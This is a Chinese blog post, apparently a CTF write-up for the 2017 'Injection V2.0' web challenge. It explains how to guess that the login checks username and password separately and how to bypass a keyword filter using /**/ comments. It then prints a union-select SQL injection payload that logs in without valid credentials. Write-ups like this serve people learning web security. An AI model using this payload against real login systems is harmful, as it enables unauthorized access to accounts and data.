Injection V2.0 2017-赛客夏令营-Web-Injection V2.0

拿到题目首先先随便输一下,发现用户名是Admin

Admin’——用户名错误

Admin#——用户名错误

Admin’#——密码错误

既然会分开用户名和密码,那就是分开检验的

因此猜测格式是

select password from - where username = ‘’

if(password = $password)

过滤单词输入后会显示Hack!

过滤了order by / limit / and,union,select 后不能加东西 /

然后抓包发现是在空格处加上了’+'因此导致系统判断是Hack,尝试用注释符/**/可以避开空格并输入,因此尝试使用自己构造用户名密码绕过登录的办法

用户名:

'/**/union/**/select/**/1'#

密码:

1

成功!

如有错误望指正
交流qq:1020328970

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值